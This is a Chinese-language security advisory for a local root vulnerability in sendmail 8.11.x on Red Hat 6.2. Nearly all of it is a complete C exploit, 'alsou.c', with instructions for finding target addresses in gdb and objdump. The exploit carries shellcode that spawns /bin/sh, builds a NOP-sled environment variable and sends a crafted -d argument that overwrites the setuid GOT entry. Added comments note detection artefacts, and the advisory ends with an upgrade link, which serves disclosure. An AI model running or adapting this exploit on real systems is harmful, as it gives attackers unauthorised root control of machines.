涉及程序: sendmail
描述: 本地攻击者利用 sendmail 漏洞能取得 root 权限
详细: 发现 sendmail 存在本地漏洞，攻击者利用此漏洞能取得 root 特权。
测试系统: Sendmail 8.11.4 on Red Hat 6.2 and kernel 2.2.18
以下代码仅仅用来测试和研究这个漏洞，如果您将其用于不正当的途径请后果自负。
/*
 * alsou.c
 *
 * sendmail-8.11.x linux x86 exploit
 *
 * To use this exploit you should know two numbers: VECT and GOT.
 * Use gdb to find the first:
 *
 * $ gdb -q /usr/sbin/sendmail
 * (gdb) break tTflag
 * Breakpoint 1 at 0x8080629
 * (gdb) r -d1-1.1
 * Starting program: /usr/sbin/sendmail -d1-1.1
 *
 * Breakpoint 1, 0x8080629 in tTflag ()
 * (gdb) disassemble tTflag
 * .............
 * 0x80806ea : dec %edi
 * 0x80806eb : mov %edi,0xfffffff8(%ebp)
 * 0x80806ee : jmp 0x80806f9
 * 0x80806f0 : mov 0x80b21f4,%eax
 *                 ^^^^^^^^^^^^^^^^^^ address of VECT
 * 0x80806f5 : mov %bl,(%esi,%eax,1)
 * 0x80806f8 : inc %esi
 * 0x80806f9 : cmp 0xfffffff8(%ebp),%esi
 * 0x80806fc : jle 0x80806f0
 * .............
 * (gdb) x/x 0x80b21f4
 * 0x80b21f4 : 0x080b9ae0
 *             ^^^^^^^^^^^^^ VECT
 *
 * Use objdump to find the second:
 * $ objdump -R /usr/sbin/sendmail |grep setuid
 * 0809e07c R_386_JUMP_SLOT setuid
 * ^^^^^^^^^ GOT
 *
 * Probably you should play with OFFSET to make exploit work.
 *
 * Constant values, written in this code found for sendmail-8.11.4
 * on RedHat-6.2. For sendmail-8.11.0 on RedHat-6.2 try VECT = 0x080b9ae0 and
 * GOT = 0x0809e07c.
 *
 * To get r00t type ./alsou and then press Ctrl+C.
 *
 *
 * grange
 *
 */
#include #include
#define OFFSET 1000 #define VECT 0x080baf20 #define GOT 0x0809f544
#define NOPNUM 1024
/*
 * Payload that main() places in the EGG environment variable behind a
 * NOP sled. Raw x86 machine code; the trailing "/bin/sh" shows that it
 * spawns a shell. Treat these bytes as hostile data: they are useful as
 * detection material (a run of 0x90 followed by this sequence in a
 * process environment), not as something to execute.
 */
char shellcode[] =
    "\x31\xc0\x31\xdb\xb0\x17\xcd\x80"
    "\xb0\x2e\xcd\x80\xeb\x15\x5b\x31"
    "\xc0\x88\x43\x07\x89\x5b\x08\x89"
    "\x43\x0c\x8d\x4b\x08\x31\xd2\xb0"
    "\x0b\xcd\x80\xe8\xe6\xff\xff\xff"
    "/bin/sh";
/*
 * Returns the current stack pointer. 32-bit x86 only.
 *
 * The inline asm leaves %esp in %eax and the caller reads it through the
 * cdecl return register; there is no C return statement, so by the
 * standard this is undefined behaviour and it only works as long as the
 * compiler does not touch %eax afterwards (expect -Wreturn-type, and
 * possible breakage with optimization or on x86-64). The asm statement
 * also declares no outputs or clobbers, so the compiler is not told that
 * %eax has been modified.
 */
unsigned int get_esp() { __asm__("movl %esp,%eax"); }
/*
 * Entry point: builds a single environment variable (EGG=<NOP sled><payload>)
 * and the "-d" debug-option string described in the file header, then
 * replaces this process with /usr/sbin/sendmail via execve().
 *
 * OFFSET is tied to this function's exact stack layout (see ret below), so
 * even reordering the declarations changes what it means. argc/argv are
 * unused.
 *
 * From a detection standpoint the observable artefacts are an EGG=
 * variable in sendmail's environment and a -d argument whose range
 * numbers are very large unsigned values rather than small category
 * numbers.
 */
int main(int argc, char *argv[])
{
    /* s and tmp are fixed 256-byte buffers written with unbounded
     * sprintf()/strcat(). The loop below emits at most four short ranges
     * (one per byte of a 32-bit value), so they cannot overflow here, but
     * the pattern is not one to copy. */
    char *egg, s[256], tmp[256], *av[3], *ev[2];
    /* All arithmetic below is unsigned and wraps by design. */
    unsigned int got = GOT, vect = VECT, ret, first, last, i;

    /* +5 = strlen("EGG=") plus the terminating NUL added by sprintf(). */
    egg = (char *)malloc(strlen(shellcode) + NOPNUM + 5);
    if (egg == NULL) {
        perror("malloc()");
        exit(-1); /* non-portable status; shows up as 255 on POSIX */
    }
    sprintf(egg, "EGG=");
    memset(egg + 4, 0x90, NOPNUM); /* 0x90 = x86 NOP: the sled */
    sprintf(egg + 4 + NOPNUM, "%s", shellcode);

    /* Guessed address somewhere inside the sled: this function's stack
     * pointer plus a tunable OFFSET (the header says to adjust it if the
     * guess is wrong). */
    ret = get_esp() + OFFSET;

    /* Build "-dfirst-last.byte-first-last.byte-...": one range per byte of
     * ret, least significant byte first, with first/last advancing by one
     * each time. first is an unsigned-wraparound way of writing the
     * distance between the two header constants (got - vect modulo 2^32). */
    sprintf(s, "-d");
    first = -vect - (0xffffffff - got + 1);
    last = first;
    while (ret) {
        i = ret & 0xff;
        sprintf(tmp, "%u-%u.%u-", first, last, i);
        strcat(s, tmp);
        last = ++first;
        ret = ret >> 8;
    }
    /* Drop the trailing '-' left by the format string. Assumes the loop
     * ran at least once (ret != 0); otherwise this removes the 'd'. */
    s[strlen(s) - 1] = '\0';

    av[0] = "/usr/sbin/sendmail";
    av[1] = s;
    av[2] = NULL;
    ev[0] = egg; /* the only variable in the child's environment */
    ev[1] = NULL;
    /* execve() returns only on failure. The result is not checked, so a
     * failed exec is silent and main() falls off the end (implicit 0 in C99). */
    execve(*av, av, ev);
}
解决方案: 下载安装升级版本: http://www.sendmail.org/8.12.0.Beta19.html
